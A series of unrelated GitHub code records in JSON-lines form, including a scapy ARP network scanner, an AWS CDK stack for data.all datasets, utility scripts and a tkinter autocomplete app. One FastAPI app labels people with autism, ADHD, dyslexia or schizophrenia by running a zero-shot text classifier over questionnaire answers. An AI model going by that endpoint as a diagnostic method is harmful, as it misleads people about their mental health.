\"-\"\n\n    corrected_name = corrected_name[:-1]\n\n    from_filename = os.path.join(drawing_img_dir, drawing_filename)\n    to_filename = os.path.join(drawing_img_dir, corrected_name + \".jpg\")\n\n    os.rename(from_filename, to_filename)\n\n","repo_name":"diskhkme/PNID","sub_path":"Tools/Misc/filename_change.py","file_name":"filename_change.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"22199266269","text":"from typing import Union\nfrom uuid import UUID\n\nfrom .base_field import 
BaseField\n\n\nclass UUIDField(BaseField):\n \"\"\" Field responsible for storing :py:class:`uuid.UUID`. \"\"\"\n\n def __init__(self, binary=True, *args, **kwargs):\n self._binary = binary\n super().__init__(*args, **kwargs)\n\n def validate(self, value):\n if not isinstance(value, UUID):\n try:\n UUID(value)\n except (ValueError, TypeError, AttributeError) as e:\n self.error(f\"Could not convert to UUID: {e}\")\n\n def is_empty(self, value) -> bool:\n return value is None or str(value) == \"\"\n\n def get_value(self, value) -> UUID:\n value = super().get_value(value)\n if isinstance(value, str):\n try:\n value = UUID(value)\n except (ValueError, TypeError, AttributeError):\n return value\n return value\n\n def to_son(self, value) -> Union[None, UUID]:\n if not self._binary:\n return str(value)\n elif isinstance(value, str):\n return UUID(value)\n return value\n\n def from_son(self, value) -> Union[None, UUID]:\n if not self._binary:\n original_value = value\n try:\n if not isinstance(value, str):\n value = str(value)\n return UUID(value)\n except (ValueError, TypeError, AttributeError):\n return original_value\n return value\n","repo_name":"wangjiancn/aiomongoengine","sub_path":"src/aiomongoengine/fields/uuid_field.py","file_name":"uuid_field.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"23113922765","text":"import numpy as np\nimport time\n\nW = 0\nP = 0\nnp.random.seed(100)\nfor i in range(10):\n M = np.random.rand(100, 120 )\n N = np.random.rand(120, 100)\n start = time.time()\n np.matmul(M, N)\n end = time.time()\n W += end - start\nprint(W/10)\n\nfor i in range(10):\n Y = np.random.randint(3, size=(100, 200))\n Z = np.random.randint(3, size=(200, 100))\n start1 = time.time()\n np.matmul(Y, Z)\n end1 = time.time()\n P += end1 - start1\n\nprint(P/10)","repo_name":"J-Shen24k/Introduction-to-Advanced-Studies-II","sub_path":"HW1/doublematrices copy.py","file_name":"doublematrices copy.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18181355773","text":"import scapy.all as scapy\nfrom tabulate import tabulate\n\ndef main():\n\tstation, client = escanear_red(\"192.168.1.0/24\", \"eth0\")\n\n\timprimir_tabla(\"Estacion\", station)\n\timprimir_tabla(\"Clientes\", client)\n\ndef escanear_red(ip, interface):\n\tarp = scapy.ARP(pdst=ip)\n\tether = scapy.Ether(dst=\"FF:FF:FF:FF:FF:FF\")\n\n\tanswer, _ = scapy.srp(ether/arp, timeout=1, iface=interface, verbose=False)\n\n\tstation = [{\"ip\": arp.psrc, \"mac\": arp.hwsrc}]\n\tclient = [{\"ip\": received.psrc, \"mac\": received.hwsrc} for _, received in answer]\n\t\n\treturn station, client\n\ndef imprimir_tabla(name, elements):\n\tprint(f\"\\n{name}:\")\n\tprint(tabulate(elements, headers=\"keys\", showindex=\"always\", tablefmt=\"fancy_grid\"))\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"FernandoPerezLara/network-scanner","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21473609187","text":"from fastapi import FastAPI\nimport uvicorn\nimport openai\nimport os\nfrom dotenv import dotenv_values\nimport json\nfrom transformers import pipeline\n\nzeroshot = pipeline(model=\"facebook/bart-large-mnli\")\n\nconfig = dotenv_values(\".env\")\nopenai.api_key = 
config[\"API_KEY\"]\n\napp = FastAPI()\n\nf = open('data/questions.json')\ndata = json.load(f)\ndef patient_description(answer):\n description = \"\"\n if answer[0] == 1:\n description+=\"Patient has trouble developing social ties \"\n if answer[1] > 5:\n description+=\"Patient has difficulty identifying emotions of others \"\n if answer[2] > 5:\n description+=\"Patient has difficulty maintaining eye contact \"\n if 5 > answer[3]:\n description+=\"Patient dislikes physical contact \"\n if answer[5] > 5:\n description+=\"Patient dislikes change \"\n if (answer[9] > 5) or (answer[7] > 5):\n description+=\"Patient is sensitive to textures or noises \"\n if answer[10] > 5:\n description+=\"Patient has difficulty studying \"\n if answer[12] > 5:\n description+=\"Patient often forgets things \"\n if answer[13] > 5:\n description+=\"Patient cannot stay still \"\n if answer[16] > 5:\n description+=\"Patient cannot read long texts with ease \"\n if answer[17] > 5:\n description+=\"Patient makes spelling mistakes often \"\n if answer[22] > 5:\n description+=\"Patient often feels in another reality \"\n if answer[23] > 5:\n description+=\"Patient expresses themselves with difficulty \"\n return description\n\n@app.get(\"/explain\")\ndef explain(subject: str, condition: str, interest: str) -> dict:\n \"\"\"Explain subject based on a list of interests\"\"\"\n base_text = f\"Explain {subject} to a {condition} patient interested in {interest}\"\n completion = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=base_text,\n temperature=0,\n max_tokens=100\n )\n return completion\n\n@app.post(\"/diagnosis\")\ndef diagnosis(answers: list) -> dict:\n description = patient_description(answers)\n classification = zeroshot(description,\n candidate_labels=[\"autism\", \"adhd\", \"dyslexia\", \"schizophrenia\", \"nothing\"],\n )\n return {\"diagnosis\": classification[\"sequence\"], \"condition\": classification[\"labels\"][0]}\n","repo_name":"sebaspv/educaid-diagnosis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"7971084240","text":"import unittest\nfrom mantid.geometry import BoundingBox\nfrom mantid.kernel import V3D\n\nclass BoundingBoxTest(unittest.TestCase):\n\n def test_default_construction_is_allowed(self):\n box = BoundingBox()\n self.assertTrue(isinstance(box, BoundingBox))\n self.assertTrue(box.isNull())\n\n def test_construction_with_min_max_values_is_allowed(self):\n box = BoundingBox(1.0, 4.0, 5.0, 0.0, 2.0, 3.0)\n self.assertTrue(isinstance(box, BoundingBox))\n\n def test_properties_are_correct(self):\n bbox = BoundingBox (1.0, 2.0, 3.0, -1.0, -2.0, -3.0)\n self.assertEquals(bbox.minPoint(), V3D(-1.0,-2.0,-3.0))\n self.assertEquals(bbox.maxPoint(), V3D(1.0,2.0,3.0))\n self.assertEquals(bbox.centrePoint(), V3D(0.0,0.0,0.0))\n self.assertEquals(bbox.width(), V3D(2.0,4.0,6.0))\n\n def test_point_inside(self):\n box = BoundingBox(1.0, 2.0, 3.0, -1.0, -2.0, -3.0)\n self.assertTrue(box.isPointInside(V3D(0.0,0.0,0.0)))\n\n def test_doesLineIntersect(self):\n bbox = BoundingBox(4.1, 4.1, 4.1, -4.1, -4.1, -4.1)\n self.assertTrue(bbox.doesLineIntersect(V3D(-6.0,0.0,0.0), V3D(1.0,0.0,0.0)))\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"utkarshayachit/mantid","sub_path":"Code/Mantid/Framework/PythonInterface/test/python/mantid/geometry/BoundingBoxTest.py","file_name":"BoundingBoxTest.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"25218277414","text":"#coding=utf-8\r\nfrom tkinter import *\r\nimport tkinter as tk\r\nfrom example_words_prediction import Autocompleter\r\nfrom combined_competer import CombinedAutocompleter\r\nfrom PIL import Image, ImageTk\r\n\r\n\r\nclass Block:\r\n    def __init__(self, master):\r\n        self.master = master\r\n        self.e = Entry(master, bg='white', fg='#696969', width=100, relief='groove', font='Times 30')\r\n        self.b = Button(master, text=\"Complete\", bg='Gainsboro', fg='black', font='Times 15')\r\n        self.b1 = Button(master, text='', bg='#A9A9A9', fg='white', font='Times 25')\r\n        self.b2 = Button(master, text='', bg='#A9A9A9', fg='white', font='Times 25')\r\n        self.b3 = Button(master, text='', bg='#A9A9A9', fg='white', font='Times 25')\r\n        self.b_clean = Button(master, text='Clean', bg='Gainsboro', fg='black', font='Times 15')\r\n        self.e.pack()\r\n        self.b.pack()\r\n        self.b1.pack()\r\n        self.b2.pack()\r\n        self.b3.pack()\r\n        self.b_clean.pack()\r\n        # self.completer = Autocompleter()\r\n        self.completer = CombinedAutocompleter()\r\n        self.text = ''\r\n\r\n        photo = tk.PhotoImage(file='D:\\\\Typing\\\\data\\\\friends.gif')\r\n        self.label = Label(image=photo, relief='flat')\r\n        self.label.image = photo\r\n        self.label.pack(side='bottom')\r\n\r\n    def setFunc(self, func):\r\n        self.b['command'] = eval('self.' + func)\r\n\r\n    def setFuncBut1(self):\r\n        self.b1['command'] = eval('self.set_text1')\r\n\r\n    def setFuncBut2(self):\r\n        self.b2['command'] = eval('self.set_text2')\r\n\r\n    def setFuncBut3(self):\r\n        self.b3['command'] = eval('self.set_text3')\r\n\r\n    def setFuncButClean(self, func):\r\n        self.b_clean['command'] = eval('self.'+func)\r\n\r\n    def complete(self):\r\n        text = self.e.get()\r\n        completions = self.completer.complete(text)\r\n        self.b1['text'] = completions[0]\r\n        self.b2['text'] = completions[1]\r\n        self.b3['text'] = completions[2]\r\n\r\n    def set_text1(self):\r\n        text = self.b1['text']\r\n        ending = len(self.e.get().split(' ')[-1])\r\n        self.e.insert(len(self.e.get()), text[ending:]+' ')\r\n        self.complete()\r\n\r\n    def set_text2(self):\r\n        text = self.b2['text']\r\n        ending = len(self.e.get().split(' ')[-1])\r\n        self.e.insert(len(self.e.get()), text[ending:]+' ')\r\n        self.complete()\r\n\r\n    def set_text3(self):\r\n        text = self.b3['text']\r\n        ending = len(self.e.get().split(' ')[-1])\r\n        self.e.insert(len(self.e.get()), text[ending:]+' ')\r\n        self.complete()\r\n\r\n    def clean(self):\r\n        self.e.delete(0, len(self.e.get()))\r\n        self.b1['text'] = ''\r\n        self.b2['text'] = ''\r\n        self.b3['text'] = ''\r\n\r\n\r\nroot = Tk()\r\nroot.geometry('800x600')\r\nroot.title('Autocomplete')\r\nroot[\"bg\"] = \"white\"\r\nfirst_block = Block(root)\r\nfirst_block.setFunc('complete')\r\nfirst_block.setFuncBut1()\r\nfirst_block.setFuncBut2()\r\nfirst_block.setFuncBut3()\r\nfirst_block.setFuncButClean('clean')\r\n\r\n# second_block = Block(root)\r\n# second_block.setFunc('strReverse')\r\n\r\nroot.mainloop()","repo_name":"BruchesLena/autocomplete","sub_path":"t1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32383781057","text":"#EXERCISE 3.- For this code we used a \"for\" loop that counts the number of \"a\" letters in our text; for that we create the variable \"contador_letra\", which adds 1 every time the letter a appears in the text.\n
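# For example (hypothetical input): for the text \"banana.\" the loop counts 3 occurrences of \"a\" and prints that count.\n\n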
texto = input(\"Enter your text: \")\ncontador_letra = 0\nfor letra in texto:\n    if letra == \"a\":\n        contador_letra = contador_letra + 1\n    elif letra == \".\":\n        break\nprint(f\"The text contains {contador_letra} letter a's.\")\n\nprint(\"\\n\")","repo_name":"jaimeeramiirez/M2_05_jaime_ramirez_rodriguez","sub_path":"ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36777457651","text":"class Solution:\n    def canJump(self, nums: List[int]) -> bool:\n        # Note: This is a dynamic programming[1] question. Usually, solving and fully understanding a dynamic programming problem is a 4 step process:\n        # * Start with the recursive backtracking solution\n        # * Optimize by using a memoization table (top-down[2] dynamic programming)\n        # * Remove the need for recursion (bottom-up dynamic programming)\n        # * Apply final tricks to reduce the time / memory complexity\n        \n        \"\"\"\n        #NOT FINISHED CODE!\n        #1 - iterate over nums, starting from 0th index\n        #2 - look current possible jumps and take the maximum number, those are in the nums[currentIndex + 1 : currentIndex + currentNumber + 1]\n        #3 - do the 2nd step until \"reach the end of the nums\", and return true\n        #4 Otherwise, if \"before index == current index\", return false\n        \n        \n        \n        # bInd => before index\n        # cInd => current index\n        # n => length of nums\n        def takeMaximumNum(nums, start, end):\n            maxNum = -1\n            maxInd = -1\n            for i in range(start, end):\n                if(start >= len(nums)):\n                    break\n                if(maxNum < nums[i]):\n                    maxNum = nums[i]\n                    maxInd = i\n            return [maxInd, maxNum]\n        \n        #print( takeMaximumNum(nums, 1, 3) )\n        \n        n = len(nums)\n        currentInd = beforeInd = 0\n        while(currentInd < n):\n            currentNumber = nums[currentInd]\n            \n            if(currentInd + 1 < n):\n                maxNumPair = takeMaximumNum(nums, currentInd + 1, currentInd + currentNumber + 1)\n                \n                beforeInd = currentInd\n                currentInd = maxNumPair[0]\n                currentNumber = maxNumPair[1]\n                \n            print(\"Before =>\", beforeInd)\n            print(\"Current =>\", currentInd)\n            if(beforeInd == currentInd):\n                return False\n        return True\n        \"\"\"\n        \n        \n        #Solution #1\n        lastPosition = len(nums) - 1\n        for i in range( len(nums) - 1, -1, -1 ):\n            if( i + nums[i] >= lastPosition ):\n                lastPosition = i\n        return lastPosition == 0\n","repo_name":"burakaslantas/Leetcode","sub_path":"problems/jump_game/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20012417253","text":"import logging\nimport os\n\nfrom aws_cdk import (\n    aws_s3 as s3,\n    aws_kms as kms,\n    aws_iam as iam,\n    aws_ssm as ssm,\n    aws_glue as glue,\n    Stack,\n    Duration,\n    CfnResource,\n    CustomResource,\n    Tags,\n)\nfrom aws_cdk.aws_glue import CfnCrawler\n\nfrom dataall.base import db\nfrom dataall.base.aws.quicksight import QuicksightClient\nfrom dataall.base.aws.sts import SessionHelper\nfrom dataall.core.environment.services.environment_service import EnvironmentService\nfrom dataall.base.cdkproxy.stacks.manager import stack\nfrom dataall.core.environment.db.environment_models import Environment, EnvironmentGroup\nfrom dataall.core.stacks.services.runtime_stacks_tagging import TagsUtil\nfrom 
dataall.modules.datasets.aws.lf_dataset_client import LakeFormationDatasetClient\nfrom dataall.modules.datasets_base.db.dataset_models import Dataset\nfrom dataall.base.utils.cdk_nag_utils import CDKNagUtil\n\nlogger = logging.getLogger(__name__)\n\n\n@stack(stack='dataset')\nclass DatasetStack(Stack):\n \"\"\"Deploy common dataset resources:\n - dataset S3 Bucket + KMS key (If S3 Bucket not imported)\n - dataset IAM role\n - custom resource to create glue database and grant permissions\n - custom resource to register S3 location in LF\n - Glue crawler\n - Glue profiling job\n \"\"\"\n module_name = __file__\n\n def get_engine(self) -> db.Engine:\n envname = os.environ.get('envname', 'local')\n engine = db.get_engine(envname=envname)\n return engine\n\n def get_env(self, dataset) -> Environment:\n engine = self.get_engine()\n with engine.scoped_session() as session:\n env = session.query(Environment).get(dataset.environmentUri)\n return env\n\n def get_env_group(self, dataset) -> EnvironmentGroup:\n engine = self.get_engine()\n with engine.scoped_session() as session:\n env = EnvironmentService.get_environment_group(\n session, dataset.SamlAdminGroupName, dataset.environmentUri\n )\n return env\n\n def get_target_with_uri(self, target_uri) -> Dataset:\n engine = self.get_engine()\n with engine.scoped_session() as session:\n dataset = session.query(Dataset).get(target_uri)\n if not dataset:\n raise Exception('ObjectNotFound')\n return dataset\n\n def get_target(self) -> Dataset:\n engine = self.get_engine()\n with engine.scoped_session() as session:\n dataset = session.query(Dataset).get(self.target_uri)\n if not dataset:\n raise Exception('ObjectNotFound')\n return dataset\n\n def has_quicksight_enabled(self, env) -> bool:\n with self.get_engine().scoped_session() as session:\n return EnvironmentService.get_boolean_env_param(session, env, \"dashboardsEnabled\")\n\n def __init__(self, scope, id, target_uri: str = None, **kwargs):\n super().__init__(\n scope,\n id,\n description=\"Cloud formation stack of DATASET: {}; URI: {}; DESCRIPTION: {}\".format(\n self.get_target_with_uri(target_uri=target_uri).label,\n target_uri,\n self.get_target_with_uri(target_uri=target_uri).description,\n )[:1024],\n **kwargs)\n\n # Read input\n self.target_uri = target_uri\n self.pivot_role_name = SessionHelper.get_delegation_role_name()\n dataset = self.get_target()\n env = self.get_env(dataset)\n env_group = self.get_env_group(dataset)\n\n quicksight_default_group_arn = None\n if self.has_quicksight_enabled(env):\n quicksight_default_group_arn = f\"arn:aws:quicksight:{dataset.region}:{dataset.AwsAccountId}:group/default/{QuicksightClient.DEFAULT_GROUP_NAME}\"\n\n # Dataset S3 Bucket and KMS key\n dataset_key = False\n if dataset.imported and dataset.importedS3Bucket:\n dataset_bucket = s3.Bucket.from_bucket_name(\n self, f'ImportedBucket{dataset.datasetUri}', dataset.S3BucketName\n )\n if dataset.importedKmsKey:\n dataset_key = kms.Key.from_lookup(\n self, f'ImportedKey{dataset.datasetUri}', alias_name=f\"alias/{dataset.KmsAlias}\"\n )\n else:\n dataset_key = kms.Key(\n self,\n 'DatasetKmsKey',\n alias=dataset.KmsAlias,\n enable_key_rotation=True,\n policy=iam.PolicyDocument(\n statements=[\n iam.PolicyStatement(\n sid=\"EnableDatasetOwnerKeyUsage\",\n resources=['*'],\n effect=iam.Effect.ALLOW,\n principals=[\n iam.ArnPrincipal(env_group.environmentIAMRoleArn),\n ],\n actions=[\n \"kms:Encrypt\",\n \"kms:Decrypt\",\n \"kms:ReEncrypt*\",\n \"kms:GenerateDataKey*\",\n \"kms:DescribeKey\",\n \"kms:List*\",\n 
\"kms:GetKeyPolicy\",\n ],\n ),\n iam.PolicyStatement(\n sid='KMSPivotRolePermissions',\n effect=iam.Effect.ALLOW,\n actions=[\n 'kms:Decrypt',\n 'kms:Encrypt',\n 'kms:GenerateDataKey*',\n 'kms:PutKeyPolicy',\n \"kms:GetKeyPolicy\",\n 'kms:ReEncrypt*',\n 'kms:TagResource',\n 'kms:UntagResource',\n 'kms:DeleteAlias',\n 'kms:DescribeKey',\n 'kms:CreateAlias',\n 'kms:List*',\n ],\n resources=['*'],\n principals=[\n iam.ArnPrincipal(f'arn:aws:iam::{env.AwsAccountId}:role/{self.pivot_role_name}')\n ],\n )\n ]\n ),\n admins=[\n iam.ArnPrincipal(env.CDKRoleArn),\n ]\n )\n\n dataset_bucket = s3.Bucket(\n self,\n 'DatasetBucket',\n bucket_name=dataset.S3BucketName,\n encryption=s3.BucketEncryption.KMS,\n encryption_key=dataset_key,\n cors=[\n s3.CorsRule(\n allowed_methods=[\n s3.HttpMethods.HEAD,\n s3.HttpMethods.POST,\n s3.HttpMethods.PUT,\n s3.HttpMethods.DELETE,\n s3.HttpMethods.GET,\n ],\n allowed_origins=['*'],\n allowed_headers=['*'],\n exposed_headers=[],\n )\n ],\n block_public_access=s3.BlockPublicAccess.BLOCK_ALL,\n server_access_logs_bucket=s3.Bucket.from_bucket_name(\n self,\n 'EnvAccessLogsBucket',\n f'{env.EnvironmentDefaultBucketName}',\n ),\n server_access_logs_prefix=f'access_logs/{dataset.S3BucketName}/',\n enforce_ssl=True,\n versioned=True,\n bucket_key_enabled=True,\n )\n\n dataset_bucket.add_lifecycle_rule(\n abort_incomplete_multipart_upload_after=Duration.days(7),\n noncurrent_version_transitions=[\n s3.NoncurrentVersionTransition(\n storage_class=s3.StorageClass.INFREQUENT_ACCESS,\n transition_after=Duration.days(30),\n ),\n s3.NoncurrentVersionTransition(\n storage_class=s3.StorageClass.GLACIER,\n transition_after=Duration.days(60),\n ),\n ],\n transitions=[\n s3.Transition(\n storage_class=s3.StorageClass.INTELLIGENT_TIERING,\n transition_after=Duration.days(90),\n ),\n s3.Transition(\n storage_class=s3.StorageClass.GLACIER,\n transition_after=Duration.days(360),\n ),\n ],\n enabled=True,\n )\n\n # Dataset IAM role - ETL policies\n dataset_admin_policy = iam.Policy(\n self,\n 'DatasetAdminPolicy',\n policy_name=dataset.S3BucketName,\n statements=[\n iam.PolicyStatement(\n sid=\"ListAll\",\n actions=[\n \"s3:ListAllMyBuckets\",\n \"s3:ListAccessPoints\",\n ],\n resources=[\"*\"],\n effect=iam.Effect.ALLOW\n ),\n iam.PolicyStatement(\n sid=\"ListDatasetBucket\",\n actions=[\n \"s3:ListBucket\",\n \"s3:GetBucketLocation\",\n \"s3:GetBucketAcl\"\n ],\n resources=[dataset_bucket.bucket_arn],\n effect=iam.Effect.ALLOW,\n ),\n iam.PolicyStatement(\n sid=\"ReadWriteDatasetBucket\",\n actions=[\n \"s3:PutObject\",\n \"s3:PutObjectAcl\",\n \"s3:GetObject\",\n \"s3:GetObjectAcl\",\n \"s3:GetObjectVersion\",\n \"s3:DeleteObject\"\n ],\n effect=iam.Effect.ALLOW,\n resources=[dataset_bucket.bucket_arn + '/*'],\n ),\n iam.PolicyStatement(\n sid=\"ReadAccessPointsDatasetBucket\",\n actions=[\n 's3:GetAccessPoint',\n 's3:GetAccessPointPolicy',\n 's3:GetAccessPointPolicyStatus',\n ],\n effect=iam.Effect.ALLOW,\n resources=[\n f'arn:aws:s3:{dataset.region}:{dataset.AwsAccountId}:accesspoint/{dataset.datasetUri}*',\n ],\n ),\n iam.PolicyStatement(\n sid=\"GlueAccessCrawler\",\n actions=[\n \"glue:Get*\",\n \"glue:BatchGet*\",\n \"glue:CreateTable\",\n \"glue:UpdateTable\",\n \"glue:DeleteTableVersion\",\n \"glue:DeleteTable\",\n 'glue:BatchCreatePartition',\n 'glue:BatchDeleteConnection',\n 'glue:BatchDeletePartition',\n 'glue:BatchDeleteTable',\n 'glue:BatchDeleteTableVersion',\n ],\n effect=iam.Effect.ALLOW,\n resources=[\n f\"arn:aws:glue:*:{dataset.AwsAccountId}:catalog\",\n 
f\"arn:aws:glue:{dataset.region}:{dataset.AwsAccountId}:database/{dataset.GlueDatabaseName}\",\n f\"arn:aws:glue:{dataset.region}:{dataset.AwsAccountId}:table/{dataset.GlueDatabaseName}/*\"\n ]\n ),\n iam.PolicyStatement(\n sid=\"GlueAccessDefault\",\n actions=[\n \"glue:GetDatabase\",\n ],\n effect=iam.Effect.ALLOW,\n resources=[\n f\"arn:aws:glue:{dataset.region}:{dataset.AwsAccountId}:database/default\",\n ]\n ),\n iam.PolicyStatement(\n sid=\"CreateLoggingGlue\",\n actions=[\n 'logs:CreateLogGroup',\n 'logs:CreateLogStream',\n ],\n effect=iam.Effect.ALLOW,\n resources=[\n f'arn:aws:logs:{dataset.region}:{dataset.AwsAccountId}:log-group:/aws-glue/crawlers*',\n f'arn:aws:logs:{dataset.region}:{dataset.AwsAccountId}:log-group:/aws-glue/jobs/*',\n ],\n ),\n iam.PolicyStatement(\n sid=\"LoggingGlue\",\n actions=[\n 'logs:PutLogEvents',\n ],\n effect=iam.Effect.ALLOW,\n resources=[\n f'arn:aws:logs:{dataset.region}:{dataset.AwsAccountId}:log-group:/aws-glue/crawlers:log-stream:{dataset.GlueCrawlerName}',\n f'arn:aws:logs:{dataset.region}:{dataset.AwsAccountId}:log-group:/aws-glue/jobs/*',\n ],\n ),\n iam.PolicyStatement(\n actions=['s3:ListBucket'],\n resources=[f'arn:aws:s3:::{env.EnvironmentDefaultBucketName}'],\n effect=iam.Effect.ALLOW\n ),\n iam.PolicyStatement(\n sid=\"ReadEnvironmentBucketProfiling\",\n actions=[\n \"s3:GetObject\",\n \"s3:GetObjectAcl\",\n \"s3:GetObjectVersion\"\n ],\n effect=iam.Effect.ALLOW,\n resources=[f'arn:aws:s3:::{env.EnvironmentDefaultBucketName}/profiling/code/*'],\n ),\n iam.PolicyStatement(\n sid=\"ReadWriteEnvironmentBucketProfiling\",\n actions=[\n \"s3:PutObject\",\n \"s3:PutObjectAcl\",\n \"s3:GetObject\",\n \"s3:GetObjectAcl\",\n \"s3:GetObjectVersion\",\n \"s3:DeleteObject\"\n ],\n resources=[f'arn:aws:s3:::{env.EnvironmentDefaultBucketName}/profiling/results/{dataset.datasetUri}/*'],\n effect=iam.Effect.ALLOW,\n ),\n ],\n )\n if dataset_key:\n dataset_admin_policy.add_statements(\n iam.PolicyStatement(\n sid=\"KMSAccess\",\n actions=[\n \"kms:Decrypt\",\n \"kms:Encrypt\",\n \"kms:GenerateDataKey\"\n ],\n effect=iam.Effect.ALLOW,\n resources=[dataset_key.key_arn],\n )\n )\n dataset_admin_policy.node.add_dependency(dataset_bucket)\n\n dataset_admin_role = iam.Role(\n self,\n 'DatasetAdminRole',\n role_name=dataset.IAMDatasetAdminRoleArn.split('/')[-1],\n assumed_by=iam.CompositePrincipal(\n iam.ArnPrincipal(\n f'arn:aws:iam::{dataset.AwsAccountId}:role/{self.pivot_role_name}'\n ),\n iam.ServicePrincipal('glue.amazonaws.com'),\n ),\n )\n dataset_admin_policy.attach_to_role(dataset_admin_role)\n\n # Add Key Policy For Users\n if not dataset.imported:\n dataset_key.add_to_resource_policy(\n iam.PolicyStatement(\n sid=\"EnableDatasetIAMRoleKeyUsage\",\n resources=['*'],\n effect=iam.Effect.ALLOW,\n principals=[dataset_admin_role],\n actions=[\n \"kms:Encrypt\",\n \"kms:Decrypt\",\n \"kms:ReEncrypt*\",\n \"kms:GenerateDataKey*\",\n \"kms:DescribeKey\"\n ],\n )\n )\n\n # Datalake location custom resource: registers the S3 location in LakeFormation\n registered_location = LakeFormationDatasetClient(env, dataset).check_existing_lf_registered_location()\n\n if not registered_location:\n storage_location = CfnResource(\n self,\n 'DatasetStorageLocation',\n type='AWS::LakeFormation::Resource',\n properties={\n 'ResourceArn': f'arn:aws:s3:::{dataset.S3BucketName}',\n 'RoleArn': dataset_admin_role.role_arn,\n 'UseServiceLinkedRole': False,\n },\n )\n\n # Define dataset admin groups (those with data access grant)\n dataset_admins = [\n 
dataset_admin_role.role_arn,\n            f'arn:aws:iam::{env.AwsAccountId}:role/{self.pivot_role_name}',\n            env_group.environmentIAMRoleArn,\n        ]\n        if quicksight_default_group_arn:\n            dataset_admins.append(quicksight_default_group_arn)\n\n        # Get the Provider service token from SSM, the Lambda and Provider are created as part of the environment stack\n        glue_db_provider_service_token = ssm.StringParameter.from_string_parameter_name(\n            self,\n            'GlueDatabaseProviderServiceToken',\n            string_parameter_name=f'/{env.resourcePrefix}/{dataset.environmentUri}/cfn/custom-resources/gluehandler/provider/servicetoken',\n        )\n\n        glue_db = CustomResource(\n            self,\n            f'{env.resourcePrefix}GlueDatabaseCustomResource',\n            service_token=glue_db_provider_service_token.string_value,\n            resource_type='Custom::GlueDatabase',\n            properties={\n                'CatalogId': dataset.AwsAccountId,\n                'DatabaseInput': {\n                    'Description': 'dataall database {} '.format(\n                        dataset.GlueDatabaseName\n                    ),\n                    'LocationUri': f's3://{dataset.S3BucketName}/',\n                    'Name': f'{dataset.GlueDatabaseName}',\n                    'CreateTableDefaultPermissions': [],\n                    'Imported': 'IMPORTED-' if dataset.imported else 'CREATED-'\n                },\n                'DatabaseAdministrators': dataset_admins,\n            },\n        )\n\n        # Support resources: GlueCrawler for the dataset, Profiling Job and Trigger\n        crawler = glue.CfnCrawler(\n            self,\n            dataset.GlueCrawlerName,\n            description=f'dataall Glue Crawler for S3 Bucket {dataset.S3BucketName}',\n            name=dataset.GlueCrawlerName,\n            database_name=dataset.GlueDatabaseName,\n            schedule={'scheduleExpression': f'{dataset.GlueCrawlerSchedule}'}\n            if dataset.GlueCrawlerSchedule\n            else None,\n            role=dataset_admin_role.role_arn,\n            targets=CfnCrawler.TargetsProperty(\n                s3_targets=[\n                    CfnCrawler.S3TargetProperty(path=f's3://{dataset.S3BucketName}')\n                ]\n            ),\n        )\n        crawler.node.add_dependency(dataset_bucket)\n\n        job_args = {\n            '--additional-python-modules': 'urllib3<2,pydeequ',\n            '--datasetUri': dataset.datasetUri,\n            '--database': dataset.GlueDatabaseName,\n            '--datasetRegion': dataset.region,\n            '--dataallRegion': os.getenv('AWS_REGION', 'eu-west-1'),\n            '--environmentUri': env.environmentUri,\n            '--environmentBucket': env.EnvironmentDefaultBucketName,\n            '--datasetBucket': dataset.S3BucketName,\n            '--apiUrl': 'None',\n            '--snsTopicArn': 'None',\n            '--extra-jars': (\n                f's3://{env.EnvironmentDefaultBucketName}'\n                f'/profiling/code/jars/deequ-2.0.0-spark-3.1.jar'\n            ),\n            '--enable-metrics': 'true',\n            '--enable-continuous-cloudwatch-log': 'true',\n            '--enable-glue-datacatalog': 'true',\n            '--SPARK_VERSION': '3.1',\n        }\n\n        job = glue.CfnJob(\n            self,\n            'DatasetGlueProfilingJob',\n            name=dataset.GlueProfilingJobName,\n            description=f'dataall Glue Profiling job for dataset {dataset.label}',\n            role=dataset_admin_role.role_arn,\n            allocated_capacity=10,\n            execution_property=glue.CfnJob.ExecutionPropertyProperty(\n                max_concurrent_runs=100\n            ),\n            command=glue.CfnJob.JobCommandProperty(\n                name='glueetl',\n                python_version='3',\n                script_location=(\n                    f's3://{env.EnvironmentDefaultBucketName}'\n                    f'/profiling/code/glue_script.py'\n                ),\n            ),\n            default_arguments=job_args,\n            glue_version='3.0',\n            tags={'Application': 'dataall'},\n        )\n        if dataset.GlueProfilingTriggerSchedule:\n            trigger = glue.CfnTrigger(\n                self,\n                'DatasetGlueProfilingTrigger',\n                name=dataset.GlueProfilingTriggerName,\n                description=f'dataall Glue Profiling trigger schedule for dataset {dataset.label}',\n                type='SCHEDULED',\n                schedule=dataset.GlueProfilingTriggerSchedule,\n                start_on_creation=True,\n                actions=[\n
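                    # each scheduled firing re-runs the profiling job above with the same job_args\n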
